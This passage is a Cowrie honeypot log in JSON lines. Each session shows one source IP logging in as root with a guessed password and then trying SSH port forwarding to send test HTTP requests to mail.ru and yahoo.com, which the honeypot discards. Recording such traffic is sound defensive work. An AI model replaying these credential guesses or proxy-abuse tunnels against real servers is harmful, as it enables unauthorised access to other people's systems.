{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.371191Z","src_ip":"77.83.207.83","session":"01c4cba6932d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4880,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4880","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.423414Z","session":"01c4cba6932d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.474720Z","src_ip":"77.83.207.83","session":"01c4cba6932d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":8385,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8385","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.617456Z","session":"01c4cba6932d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.668699Z","src_ip":"77.83.207.83","session":"01c4cba6932d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":27503,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27503","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.813593Z","session":"01c4cba6932d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.864765Z","src_ip":"77.83.207.83","session":"01c4cba6932d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.916569Z","src_ip":"77.83.207.83","session":"01c4cba6932d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48441,"dst_ip":"1.2.3.4","dst_port":22,"session":"54f21f50cdf8","protocol":"ssh","message":"New connection: 77.83.207.83:48441 (1.2.3.4:22) [session: 54f21f50cdf8]","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.964905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.974999Z","src_ip":"77.83.207.83","session":"54f21f50cdf8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.015167Z","src_ip":"77.83.207.83","session":"54f21f50cdf8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.265127Z","src_ip":"77.83.207.83","session":"54f21f50cdf8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21259,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21259","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.315862Z","session":"54f21f50cdf8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.365684Z","src_ip":"77.83.207.83","session":"54f21f50cdf8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":23435,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23435","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.508254Z","session":"54f21f50cdf8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.558155Z","src_ip":"77.83.207.83","session":"54f21f50cdf8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":4256,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4256","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.700064Z","session":"54f21f50cdf8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.749860Z","src_ip":"77.83.207.83","session":"54f21f50cdf8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.800367Z","src_ip":"77.83.207.83","session":"54f21f50cdf8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48520,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a3ba8cea679","protocol":"ssh","message":"New connection: 77.83.207.83:48520 (1.2.3.4:22) [session: 3a3ba8cea679]","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.850230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.851109Z","src_ip":"77.83.207.83","session":"3a3ba8cea679"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:13.901903Z","src_ip":"77.83.207.83","session":"3a3ba8cea679"}
{"eventid":"cowrie.session.closed","duration":"32.6","message":"Connection lost after 32.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.001530Z","src_ip":"212.227.235.229","session":"e2130d27f754"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.153115Z","src_ip":"77.83.207.83","session":"3a3ba8cea679"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9287,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9287","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.204315Z","session":"3a3ba8cea679"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.254784Z","src_ip":"77.83.207.83","session":"3a3ba8cea679"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1703,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1703","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.397054Z","session":"3a3ba8cea679"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.447456Z","src_ip":"77.83.207.83","session":"3a3ba8cea679"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":27161,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27161","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.588728Z","session":"3a3ba8cea679"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.639151Z","src_ip":"77.83.207.83","session":"3a3ba8cea679"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.690127Z","src_ip":"77.83.207.83","session":"3a3ba8cea679"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48603,"dst_ip":"1.2.3.4","dst_port":22,"session":"13a9bff7c924","protocol":"ssh","message":"New connection: 77.83.207.83:48603 (1.2.3.4:22) [session: 13a9bff7c924]","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.738414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.748322Z","src_ip":"77.83.207.83","session":"13a9bff7c924"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:14.788554Z","src_ip":"77.83.207.83","session":"13a9bff7c924"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.036450Z","src_ip":"77.83.207.83","session":"13a9bff7c924"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31831,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31831","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.087626Z","session":"13a9bff7c924"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.137421Z","src_ip":"77.83.207.83","session":"13a9bff7c924"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":9753,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:9753","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.280122Z","session":"13a9bff7c924"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.329915Z","src_ip":"77.83.207.83","session":"13a9bff7c924"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":27822,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27822","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.471996Z","session":"13a9bff7c924"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.521747Z","src_ip":"77.83.207.83","session":"13a9bff7c924"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.572406Z","src_ip":"77.83.207.83","session":"13a9bff7c924"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48679,"dst_ip":"1.2.3.4","dst_port":22,"session":"76828df18f03","protocol":"ssh","message":"New connection: 77.83.207.83:48679 (1.2.3.4:22) [session: 76828df18f03]","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.620817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.630155Z","src_ip":"77.83.207.83","session":"76828df18f03"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.671339Z","src_ip":"77.83.207.83","session":"76828df18f03"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.918604Z","src_ip":"77.83.207.83","session":"76828df18f03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11607,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11607","sensor":"my-vps","timestamp":"2025-08-31T03:54:15.969012Z","session":"76828df18f03"}
{"eventid":"cowrie.session.closed","duration":12.759921312332153,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.014025Z","src_ip":"212.227.235.229","session":"f25ab11d87c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.018635Z","src_ip":"77.83.207.83","session":"76828df18f03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":26726,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26726","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.160023Z","session":"76828df18f03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.210585Z","src_ip":"77.83.207.83","session":"76828df18f03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42761,"dst_ip":"1.2.3.4","dst_port":23,"session":"9be4f3b08046","protocol":"telnet","message":"New connection: 212.227.235.229:42761 (1.2.3.4:23) [session: 9be4f3b08046]","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.236751Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17010,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17010","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.351910Z","session":"76828df18f03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.401823Z","src_ip":"77.83.207.83","session":"76828df18f03"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.452476Z","src_ip":"77.83.207.83","session":"76828df18f03"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48767,"dst_ip":"1.2.3.4","dst_port":22,"session":"390321ac5f57","protocol":"ssh","message":"New connection: 77.83.207.83:48767 (1.2.3.4:22) [session: 390321ac5f57]","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.501203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.501986Z","src_ip":"77.83.207.83","session":"390321ac5f57"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,